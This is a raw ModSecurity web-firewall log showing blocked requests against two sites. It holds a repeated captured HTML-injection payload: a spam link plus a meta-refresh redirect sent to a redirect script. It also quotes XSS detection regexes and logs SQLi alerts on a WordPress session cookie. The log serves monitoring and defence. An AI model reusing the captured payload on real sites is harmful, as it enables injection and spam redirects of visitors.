[Mon May 11 22:32:00.092277 2026] [security2:error] [pid 1606352:tid 1606438] [client 27.78.84.116:62460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wHo_DFxNSZVmaX3SvwAAANM"]
[Mon May 11 22:32:00.466101 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8v6FW67LJTsgN3jQN2wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:01.238287 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8waFW67LJTsgN3jQN3QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:01.238580 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8waFW67LJTsgN3jQN3QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:01.788996 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8waFW67LJTsgN3jQN3QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:01.808412 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>high-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.808856 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>H..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.809918 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.815558 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OW [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.816273 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.816771 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:01.817391 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:62601] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wR2Cvzd_nyNfUm8A-wAAARg"]
[Mon May 11 22:32:02.042280 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8wqFW67LJTsgN3jQN3gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:02.042556 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8wqFW67LJTsgN3jQN3gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:02.535244 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>high-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.535657 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>H..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.537712 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.541848 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OW [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.542876 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>High-class middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.543341 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.543761 2026] [security2:error] [pid 1590352:tid 1590403] [client 27.78.84.116:62759] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI8wq1q0G_aXAqWauT8zgAAAIs"]
[Mon May 11 22:32:02.657914 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8wqFW67LJTsgN3jQN3gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:03.533667 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8w6FW67LJTsgN3jQN3wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:03.533941 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8w6FW67LJTsgN3jQN3wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:03.899221 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8w6FW67LJTsgN3jQN3wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:05.231991 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8xaFW67LJTsgN3jQN4QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:05.232286 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8xaFW67LJTsgN3jQN4QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:05.815446 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8xaFW67LJTsgN3jQN4QAAABU"], referer: https://rentparadise.fr/wp-login.php
